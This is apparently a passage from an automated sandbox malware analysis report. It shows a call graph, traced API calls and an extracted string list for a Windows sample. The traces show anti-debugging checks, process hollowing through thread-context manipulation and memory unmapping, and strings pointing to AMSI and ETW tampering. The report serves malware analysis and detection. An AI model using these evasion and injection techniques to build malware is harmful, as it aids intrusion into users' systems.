2d08e14 39438->39439 39440 2cf47ec 11 API calls 39439->39440 39441 2d08e39 39440->39441 39442 2d089d0 20 API calls 39441->39442 39443 2d08e54 39442->39443 39444 2d0a8b7 39443->39444 39445 2cf4860 11 API calls 39443->39445 39446 2cf4500 11 API calls 39444->39446 39449 2d08e85 39445->39449 39447 2d0a8d4 39446->39447 39448 2cf4500 11 API calls 39447->39448 39450 2d0a8e4 39448->39450 39452 2cf47ec 11 API calls 39449->39452 39451 2cf4c60 SysFreeString 39450->39451 39453 2d0a8ef 39451->39453 39457 2d08eaa 39452->39457 39454 2cf4500 11 API calls 39453->39454 39455 2d0a8ff 39454->39455 39456 2cf44dc 11 API calls 39455->39456 39458 2d0a907 39456->39458 39461 2d089d0 20 API calls 39457->39461 39459 2cf4500 11 API calls 39458->39459 39460 2d0a914 39459->39460 39462 2cf4500 11 API calls 39460->39462 39463 2d08ec5 39461->39463 39465 2d0a921 39462->39465 39464 2cf4860 11 API calls 39463->39464 39466 2d08ede 39464->39466 39465->38788 39467 2cf47ec 11 API calls 39466->39467 39468 2d08f03 39467->39468 39469 2d089d0 20 API calls 39468->39469 39470 2d08f1e 39469->39470 39470->39444 39471 2cf4860 11 API calls 39470->39471 39472 2d08f66 39471->39472 39473 2cf47ec 11 API calls 39472->39473 39474 2d08f8b 39473->39474 39475 2d089d0 20 API calls 39474->39475 39476 2d08fa6 39475->39476 39477 2cf4860 11 API calls 39476->39477 39478 2d08fbf 39477->39478 39479 2cf47ec 11 API calls 39478->39479 39480 2d08fe4 39479->39480 39481 2d089d0 20 API calls 39480->39481 39482 2d08fff 39481->39482 39483 2cf4860 11 API calls 39482->39483 39484 2d09044 39483->39484 39485 2cf47ec 11 API calls 39484->39485 39486 2d09069 39485->39486 39487 2d089d0 20 API calls 39486->39487 39488 2d09084 39487->39488 39489 2cf4860 11 API calls 39488->39489 39490 2d0909d 39489->39490 39491 2cf47ec 11 API calls 39490->39491 39492 2d090c5 39491->39492 39493 2d089d0 20 API calls 39492->39493 39494 2d090e3 39493->39494 39495 2cf4860 11 API calls 39494->39495 39496 2d090ff 39495->39496 39497 2cf47ec 11 API calls 39496->39497 39498 2d09130 39497->39498 39499 2d089d0 20 API calls 39498->39499 39500 2d09154 39499->39500 39501 2cf4860 11 API calls 39500->39501 39502 2d09170 39501->39502 39503 2cf47ec 11 API calls 39502->39503 39504 2d091a1 39503->39504 39505 2d089d0 20 API calls 39504->39505 39506 2d091c5 39505->39506 39507 2cf4860 11 API calls 39506->39507 39508 2d091e1 39507->39508 39509 2cf47ec 11 API calls 39508->39509 39510 2d09212 39509->39510 39511 2d089d0 20 API calls 39510->39511 39512 2d09236 39511->39512 39513 2d08788 18 API calls 39512->39513 39514 2d09273 39513->39514 39515 2d092e8 39514->39515 39517 2cf4860 11 API calls 39514->39517 39516 2cf4860 11 API calls 39515->39516 39519 2d09304 39516->39519 39518 2d09293 39517->39518 39521 2cf47ec 11 API calls 39518->39521 39520 2cf47ec 11 API calls 39519->39520 39522 2d09335 39520->39522 39523 2d092c4 39521->39523 39524 2d089d0 20 API calls 39522->39524 39525 2d089d0 20 API calls 39523->39525 39526 2d09359 39524->39526 39525->39515 39527 2d089d0 20 API calls 39526->39527 39528 2d0938c 39527->39528 39529 2cf4860 11 API calls 39528->39529 39530 2d093a8 39529->39530 39531 2cf47ec 11 API calls 39530->39531 39532 2d093d9 39531->39532 39533 2d089d0 20 API calls 39532->39533 39534 2d093fd 39533->39534 39535 2cf4860 11 API calls 39534->39535 39536 2d09419 39535->39536 39537 2cf47ec 11 API calls 39536->39537 39538 2d0944a 39537->39538 39539 2d089d0 20 API calls 39538->39539 39540 2d0946e 39539->39540 39541 2cf2ee0 2 API calls 39540->39541 39542 2d09473 39541->39542 39543 2cf4860 11 API calls 39542->39543 39544 2d094b6 39543->39544 39545 2cf47ec 11 API calls 39544->39545 39546 2d094e7 39545->39546 39547 2d089d0 20 API calls 39546->39547 39548 2d0950b 39547->39548 39549 2cf4860 11 API calls 39548->39549 39550 2d09527 39549->39550 39551 2cf47ec 11 API calls 39550->39551 39552 2d09558 39551->39552 39553 2d089d0 20 API calls 39552->39553 39554 2d0957c 39553->39554 39555 2cf4860 11 API calls 39554->39555 39556 2d09598 39555->39556 39557 2cf47ec 11 API calls 39556->39557 39558 2d095c9 39557->39558 39559 2d089d0 20 API calls 39558->39559 39560 2d095ed GetThreadContext 39559->39560 39560->39444 39561 2d0960f 39560->39561 39562 2cf4860 11 API calls 39561->39562 39563 2d0962b 39562->39563 39564 2cf47ec 11 API calls 39563->39564 39565 2d0965c 39564->39565 39566 2d089d0 20 API calls 39565->39566 39567 2d09680 39566->39567 39568 2cf4860 11 API calls 39567->39568 39569 2d0969c 39568->39569 39570 2cf47ec 11 API calls 39569->39570 39571 2d096cd 39570->39571 39572 2d089d0 20 API calls 39571->39572 39573 2d096f1 39572->39573 39574 2cf4860 11 API calls 39573->39574 39575 2d0970d 39574->39575 39576 2cf47ec 11 API calls 39575->39576 39577 2d0973e 39576->39577 39578 2d089d0 20 API calls 39577->39578 39579 2d09762 39578->39579 39580 2cf4860 11 API calls 39579->39580 39581 2d0977e 39580->39581 39582 2cf47ec 11 API calls 39581->39582 39583 2d097af 39582->39583 39584 2d089d0 20 API calls 39583->39584 39585 2d097d3 39584->39585 39586 2cf4860 11 API calls 39585->39586 39587 2d097ef 39586->39587 39588 2cf47ec 11 API calls 39587->39588 39589 2d09820 39588->39589 39590 2d089d0 20 API calls 39589->39590 39591 2d09844 39590->39591 39851 2d08400 39591->39851 39594 2d09878 39596 2cf4860 11 API calls 39594->39596 39595 2d09b7f 39597 2cf4860 11 API calls 39595->39597 39599 2d09894 39596->39599 39598 2d09b9b 39597->39598 39600 2cf47ec 11 API calls 39598->39600 39601 2cf47ec 11 API calls 39599->39601 39602 2d09bcc 39600->39602 39603 2d098c5 39601->39603 39604 2d089d0 20 API calls 39602->39604 39605 2d089d0 20 API calls 39603->39605 39606 2d09b78 39604->39606 39607 2d098e9 39605->39607 39609 2cf4860 11 API calls 39606->39609 39608 2cf4860 11 API calls 39607->39608 39611 2d09905 39608->39611 39610 2d09c0c 39609->39610 39612 2cf47ec 11 API calls 39610->39612 39613 2cf47ec 11 API calls 39611->39613 39614 2d09c3d 39612->39614 39615 2d09936 39613->39615 39616 2d089d0 20 API calls 39614->39616 39617 2d089d0 20 API calls 39615->39617 39618 2d09c61 39616->39618 39619 2d0995a 39617->39619 39620 2cf4860 11 API calls 39618->39620 39621 2cf4860 11 API calls 39619->39621 39623 2d09c7d 39620->39623 39622 2d09976 39621->39622 39625 2cf47ec 11 API calls 39622->39625 39624 2cf47ec 11 API calls 39623->39624 39626 2d09cae 39624->39626 39627 2d099a7 39625->39627 39628 2d089d0 20 API calls 39626->39628 39629 2d089d0 20 API calls 39627->39629 39630 2d09cd2 39628->39630 39631 2d099cb 39629->39631 39632 2cf4860 11 API calls 39630->39632 39865 2d08670 39631->39865 39640 2d09cee 39632->39640 39635 2d099e3 39638 2d07a2c 18 API calls 39635->39638 39636 2d09a0b 39637 2cf4860 11 API calls 39636->39637 39643 2d09a27 39637->39643 39639 2d09a04 39638->39639 39641 2cf4860 11 API calls 39639->39641 39642 2cf47ec 11 API calls 39640->39642 39646 2d09a98 39641->39646 39645 2d09d1f 39642->39645 39644 2cf47ec 11 API calls 39643->39644 39650 2d09a58 39644->39650 39647 2d089d0 20 API calls 39645->39647 39648 2cf47ec 11 API calls 39646->39648 39649 2d09d43 39647->39649 39654 2d09ac9 39648->39654 39651 2d07a2c 18 API calls 39649->39651 39653 2d089d0 20 API calls 39650->39653 39652 2d09d64 39651->39652 39652->39444 39655 2cf4860 11 API calls 39652->39655 39653->39639 39656 2d089d0 20 API calls 39654->39656 39659 2d09d92 39655->39659 39657 2d09aed 39656->39657 39658 2cf4860 11 API calls 39657->39658 39661 2d09b09 39658->39661 39660 2cf47ec 11 API calls 39659->39660 39663 2d09dc3 39660->39663 39662 2cf47ec 11 API calls 39661->39662 39666 2d09b3a 39662->39666 39664 2d089d0 20 API calls 39663->39664 39665 2d09de7 39664->39665 39667 2cf4860 11 API calls 39665->39667 39668 2d089d0 20 API calls 39666->39668 39671 2d09e03 39667->39671 39669 2d09b5e 39668->39669 39879 2d07a2c 39669->39879 39672 2cf47ec 11 API calls 39671->39672 39673 2d09e34 39672->39673 39674 2d089d0 20 API calls 39673->39674 39675 2d09e58 39674->39675 39893 2d08c80 39675->39893 39677 2cf4860 11 API calls 39679 2d09edf 39677->39679 39678 2d09e5f 39678->39677 39680 2cf47ec 11 API calls 39679->39680 39681 2d09f10 39680->39681 39682 2d089d0 20 API calls 39681->39682 39683 2d09f34 39682->39683 39684 2cf4860 11 API calls 39683->39684 39685 2d09f50 39684->39685 39686 2cf47ec 11 API calls 39685->39686 39687 2d09f81 39686->39687 39688 2d089d0 20 API calls 39687->39688 39689 2d09fa5 39688->39689 39690 2cf4860 11 API calls 39689->39690 39691 2d09fc1 39690->39691 39692 2cf47ec 11 API calls 39691->39692 39693 2d09ff2 39692->39693 39694 2d089d0 20 API calls 39693->39694 39695 2d0a016 39694->39695 39696 2d07d78 18 API calls 39695->39696 39697 2d0a033 39696->39697 39698 2cf4860 11 API calls 39697->39698 39699 2d0a04f 39698->39699 39700 2cf47ec 11 API calls 39699->39700 39701 2d0a080 39700->39701 39702 2d089d0 20 API calls 39701->39702 39703 2d0a0a4 39702->39703 39704 2cf4860 11 API calls 39703->39704 39705 2d0a0c0 39704->39705 39706 2cf47ec 11 API calls 39705->39706 39707 2d0a0f1 39706->39707 39708 2d089d0 20 API calls 39707->39708 39709 2d0a115 39708->39709 39710 2cf4860 11 API calls 39709->39710 39711 2d0a131 39710->39711 39712 2cf47ec 11 API calls 39711->39712 39713 2d0a162 39712->39713 39714 2d089d0 20 API calls 39713->39714 39715 2d0a186 39714->39715 39716 2d07d78 18 API calls 39715->39716 39717 2d0a1a6 39716->39717 39718 2cf4860 11 API calls 39717->39718 39719 2d0a1c2 39718->39719 39720 2cf47ec 11 API calls 39719->39720 39721 2d0a1f3 39720->39721 39722 2d089d0 20 API calls 39721->39722 39723 2d0a217 39722->39723 39724 2cf4860 11 API calls 39723->39724 39725 2d0a233 39724->39725 39726 2cf47ec 11 API calls 39725->39726 39727 2d0a264 39726->39727 39728 2d089d0 20 API calls 39727->39728 39729 2d0a288 39728->39729 39730 2cf4860 11 API calls 39729->39730 39731 2d0a2a4 39730->39731 39732 2cf47ec 11 API calls 39731->39732 39733 2d0a2d5 39732->39733 39734 2d089d0 20 API calls 39733->39734 39735 2d0a2f9 SetThreadContext NtResumeThread 39734->39735 39736 2cf4860 11 API calls 39735->39736 39737 2d0a345 39736->39737 39738 2cf47ec 11 API calls 39737->39738 39739 2d0a376 39738->39739 39740 2d089d0 20 API calls 39739->39740 39741 2d0a39a 39740->39741 39742 2cf4860 11 API calls 39741->39742 39743 2d0a3b6 39742->39743 39744 2cf47ec 11 API calls 39743->39744 39745 2d0a3e7 39744->39745 39746 2d089d0 20 API calls 39745->39746 39747 2d0a40b 39746->39747 39748 2cf4860 11 API calls 39747->39748 39749 2d0a427 39748->39749 39750 2cf47ec 11 API calls 39749->39750 39751 2d0a458 39750->39751 39752 2d089d0 20 API calls 39751->39752 39753 2d0a47c 39752->39753 39754 2cf4860 11 API calls 39753->39754 39755 2d0a498 39754->39755 39756 2cf47ec 11 API calls 39755->39756 39757 2d0a4c9 39756->39757 39758 2d089d0 20 API calls 39757->39758 39759 2d0a4ed 39758->39759 39760 2cf2c2c 11 API calls 39759->39760 39761 2d0a4fc 39760->39761 39762 2cf4860 11 API calls 39761->39762 39763 2d0a51e 39762->39763 39764 2cf47ec 11 API calls 39763->39764 39765 2d0a54f 39764->39765 39766 2d089d0 20 API calls 39765->39766 39767 2d0a573 39766->39767 39768 2d0894c 21 API calls 39767->39768 39769 2d0a587 39768->39769 39770 2d0894c 21 API calls 39769->39770 39771 2d0a59b 39770->39771 39772 2d0894c 21 API calls 39771->39772 39773 2d0a5af 39772->39773 39774 2cf4860 11 API calls 39773->39774 39775 2d0a5cb 39774->39775 39776 2cf47ec 11 API calls 39775->39776 39777 2d0a5fc 39776->39777 39778 2d089d0 20 API calls 39777->39778 39779 2d0a620 39778->39779 39780 2d0894c 21 API calls 39779->39780 39781 2d0a634 39780->39781 39782 2d0894c 21 API calls 39781->39782 39783 2d0a648 39782->39783 39784 2cf4860 11 API calls 39783->39784 39785 2d0a664 39784->39785 39786 2cf47ec 11 API calls 39785->39786 39787 2d0a682 39786->39787 39788 2d0894c 21 API calls 39787->39788 39789 2d0a69a 39788->39789 39790 2cf4860 11 API calls 39789->39790 39791 2d0a6b6 39790->39791 39792 2cf47ec 11 API calls 39791->39792 39793 2d0a6d4 39792->39793 39794 2d0894c 21 API calls 39793->39794 39795 2d0a6ec 39794->39795 39796 2d0894c 21 API calls 39795->39796 39797 2d0a700 39796->39797 39798 2d0894c 21 API calls 39797->39798 39799 2d0a714 39798->39799 39800 2d0894c 21 API calls 39799->39800 39801 2d0a728 39800->39801 39802 2d0894c 21 API calls 39801->39802 39803 2d0a73c 39802->39803 39804 2cf4860 11 API calls 39803->39804 39805 2d0a758 39804->39805 39806 2cf47ec 11 API calls 39805->39806 39807 2d0a776 39806->39807 39808 2d0894c 21 API calls 39807->39808 39809 2d0a78e 39808->39809 39810 2cf4860 11 API calls 39809->39810 39811 2d0a7aa 39810->39811 39812 2cf47ec 11 API calls 39811->39812 39813 2d0a7c8 39812->39813 39814 2d0894c 21 API calls 39813->39814 39815 2d0a7e0 39814->39815 39816 2cf4860 11 API calls 39815->39816 39817 2d0a7fc 39816->39817 39818 2cf47ec 11 API calls 39817->39818 39819 2d0a81a 39818->39819 39820 2d0894c 21 API calls 39819->39820 39821 2d0a832 39820->39821 39822 2cf4860 11 API calls 39821->39822 39823 2d0a84e 39822->39823 39824 2cf47ec 11 API calls 39823->39824 39825 2d0a86c 39824->39825 39826 2d0894c 21 API calls 39825->39826 39827 2d0a884 39826->39827 39828 2d0894c 21 API calls 39827->39828 39829 2d0a8a3 39828->39829 39830 2d0894c 21 API calls 39829->39830 39830->39444 39832 2cf4530 11 API calls 39831->39832 39833 2d085df 39832->39833 39834 2cf4860 11 API calls 39833->39834 39835 2d085fe 39834->39835 39836 2d081cc 17 API calls 39835->39836 39837 2d08611 39836->39837 39838 2d08274 15 API calls 39837->39838 39839 2d08617 WinExec 39838->39839 39840 2d08639 39839->39840 39841 2cf44dc 11 API calls 39840->39841 39842 2d08641 39841->39842 39842->38719 39843->38777 39844->38936 39845->38987 39846->39111 39847->38941 39848->39035 39850 2cf49a4 GetFileAttributesA 39849->39850 39850->39429 39852 2cf4530 11 API calls 39851->39852 39853 2d08425 39852->39853 39854 2d0798c 12 API calls 39853->39854 39855 2d08432 39854->39855 39856 2cf47ec 11 API calls 39855->39856 39857 2d0843f 39856->39857 39858 2d081cc 17 API calls 39857->39858 39859 2d08452 39858->39859 39860 2d08274 15 API calls 39859->39860 39861 2d08458 NtReadVirtualMemory 39860->39861 39862 2d08486 39861->39862 39863 2cf4500 11 API calls 39862->39863 39864 2d08493 39863->39864 39864->39594 39864->39595 39866 2cf4530 11 API calls 39865->39866 39867 2d08695 39866->39867 39868 2d0798c 12 API calls 39867->39868 39869 2d086a2 39868->39869 39870 2cf47ec 11 API calls 39869->39870 39871 2d086af 39870->39871 39872 2d081cc 17 API calls 39871->39872 39873 2d086c2 39872->39873 39874 2d08274 15 API calls 39873->39874 39875 2d086c8 NtUnmapViewOfSection 39874->39875 39876 2d086e8 39875->39876 39877 2cf4500 11 API calls 39876->39877 39878 2d086f5 39877->39878 39878->39635 39878->39636 39880 2cf4530 11 API calls 39879->39880 39881 2d07a51 39880->39881 39882 2d0798c 12 API calls 39881->39882 39883 2d07a5e 39882->39883 39884 2cf47ec 11 API calls 39883->39884 39885 2d07a6b 39884->39885 39886 2d081cc 17 API calls 39885->39886 39887 2d07a7e 39886->39887 39888 2d08274 15 API calls 39887->39888 39889 2d07a84 NtAllocateVirtualMemory 39888->39889 39890 2d07ab5 39889->39890 39891 2cf4500 11 API calls 39890->39891 39892 2d07ac2 39891->39892 39892->39606 39894 2cf2c10 11 API calls 39893->39894 39895 2d08cb6 39894->39895 39895->39678 39896 2d1d2fc 39906 2cf656c 39896->39906 39900 2d1d32a 39911 2d1c35c timeSetEvent 39900->39911 39902 2d1d334 39903 2d1d342 GetMessageA 39902->39903 39904 2d1d352 39903->39904 39905 2d1d336 TranslateMessage DispatchMessageA 39903->39905 39905->39903 39907 2cf6577 39906->39907 39912 2cf4198 39907->39912 39910 2cf42ac SysFreeString SysReAllocStringLen SysAllocStringLen 39910->39900 39911->39902 39913 2cf41de 39912->39913 39914 2cf43e8 39913->39914 39915 2cf4257 39913->39915 39918 2cf442a 39914->39918 39919 2cf4419 39914->39919 39926 2cf4130 39915->39926 39922 2cf446f FreeLibrary 39918->39922 39923 2cf4493 39918->39923 39931 2cf435c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 39919->39931 39921 2cf4423 39921->39918 39922->39918 39924 2cf449c 39923->39924 39925 2cf44a2 ExitProcess 39923->39925 39924->39925 39927 2cf4173 39926->39927 39928 2cf4140 39926->39928 39927->39910 39928->39927 39929 2cf15cc VirtualAlloc 39928->39929 39932 2cf5868 39928->39932 39929->39928 39931->39921 39933 2cf5878 GetModuleFileNameA 39932->39933 39934 2cf5894 39932->39934 39936 2cf5acc GetModuleFileNameA RegOpenKeyExA 39933->39936 39934->39928 39937 2cf5b4f 39936->39937 39938 2cf5b0f RegOpenKeyExA 39936->39938 39954 2cf5908 12 API calls 39937->39954 39938->39937 39939 2cf5b2d RegOpenKeyExA 39938->39939 39939->39937 39941 2cf5bd8 lstrcpynA GetThreadLocale GetLocaleInfoA 39939->39941 39945 2cf5c0f 39941->39945 39946 2cf5cf2 39941->39946 39942 2cf5b74 RegQueryValueExA 39943 2cf5bb2 RegCloseKey 39942->39943 39944 2cf5b94 RegQueryValueExA 39942->39944 39943->39934 39944->39943 39945->39946 39948 2cf5c1f lstrlenA 39945->39948 39946->39934 39949 2cf5c37 39948->39949 39949->39946 39950 2cf5c5c lstrcpynA LoadLibraryExA 39949->39950 39951 2cf5c84 39949->39951 39950->39951 39951->39946 39952 2cf5c8e lstrcpynA LoadLibraryExA 39951->39952 39952->39946 39953 2cf5cc0 lstrcpynA LoadLibraryExA 39952->39953 39953->39946 39954->39942

                                                                                                                                                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                                                                                                                                                      Function 02D0F7C8 Relevance: 227.8, APIs: 8, Strings: 117, Instructions: 9071COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • InetIsOffline.URL(00000000,00000000,02D1B784,?,?,?,00000000,00000000), ref: 02D0F801
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D089D0: FreeLibrary.KERNEL32(75470000,00000000,00000000,00000000,00000000,02D7738C,Function_0000662C,00000004,02D7739C,02D7738C,05F5E103,00000040,02D773A0,75470000,00000000,00000000), ref: 02D08AAA
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0F6E8: GetModuleHandleW.KERNEL32(KernelBase,?,02D0FAEB,UacInitialize,02D77380,02D1B7B8,OpenSession,02D77380,02D1B7B8,ScanBuffer,02D77380,02D1B7B8,ScanString,02D77380,02D1B7B8,Initialize), ref: 02D0F6EE
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0F6E8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02D0F700
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0F744: GetModuleHandleW.KERNEL32(KernelBase), ref: 02D0F754
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0F744: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02D0F766
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0F744: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02D0F77D
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CF7E5C: GetFileAttributesA.KERNEL32(00000000,?,02D1041F,ScanString,02D77380,02D1B7B8,OpenSession,02D77380,02D1B7B8,ScanString,02D77380,02D1B7B8,UacScan,02D77380,02D1B7B8,UacInitialize), ref: 02CF7E67
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CFC364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02E6B8B8,?,02D10751,ScanBuffer,02D77380,02D1B7B8,OpenSession,02D77380,02D1B7B8,ScanBuffer,02D77380,02D1B7B8,OpenSession), ref: 02CFC37B
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0DD70: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02D0DE40), ref: 02D0DDAB
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0DD70: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02D0DE40), ref: 02D0DDDB
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0DD70: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02D0DDF0
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0DD70: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02D0DE1C
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0DD70: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02D0DE25
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CF7E80: GetFileAttributesA.KERNEL32(00000000,?,02D1356F,ScanString,02D77380,02D1B7B8,OpenSession,02D77380,02D1B7B8,ScanBuffer,02D77380,02D1B7B8,OpenSession,02D77380,02D1B7B8,Initialize), ref: 02CF7E8B
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CF8048: CreateDirectoryA.KERNEL32(00000000,00000000,?,02D1370D,OpenSession,02D77380,02D1B7B8,ScanString,02D77380,02D1B7B8,Initialize,02D77380,02D1B7B8,ScanString,02D77380,02D1B7B8), ref: 02CF8055
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryFreeInetInformationLibraryName_OfflineOpenPresentQueryReadRemote
                                                                                                                                                                                                                                                                                                                                                      • String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 297057983-2644593349
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 558070e1eaf7092870ac3f423702126b671c5ef4da7e5c8061857e4035749ba8
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: ec32cf5cec9c2f809c0cbdb074dde59aef3a48a6d082ec2970894fac2b3f115b
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 558070e1eaf7092870ac3f423702126b671c5ef4da7e5c8061857e4035749ba8
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D4141C34A0425D9FDBA4EB64EC80ACF73BAFF85304F5040A6D609AB754DA30AE85DF51
                                                                                                                                                                                                                                                                                                                                                      Function 02D08D70 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654threadnativeinjectionCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                                                                      control_flow_graph 6027 2d08d70-2d08d73 6028 2d08d78-2d08d7d 6027->6028 6028->6028 6029 2d08d7f-2d08e66 call 2cf4990 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 6028->6029 6060 2d0a8b7-2d0a921 call 2cf4500 * 2 call 2cf4c60 call 2cf4500 call 2cf44dc call 2cf4500 * 2 6029->6060 6061 2d08e6c-2d08f47 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 6029->6061 6061->6060 6105 2d08f4d-2d09275 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf30d4 * 2 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf4de0 call 2cf4df0 call 2d08788 6061->6105 6214 2d09277-2d092e3 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 6105->6214 6215 2d092e8-2d09609 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 2cf46d4 * 2 call 2d089d0 call 2cf4860 call 2cf49a0 call 2cf46d4 call 2cf47ec call 2cf49a0 call 2cf46d4 call 2d089d0 call 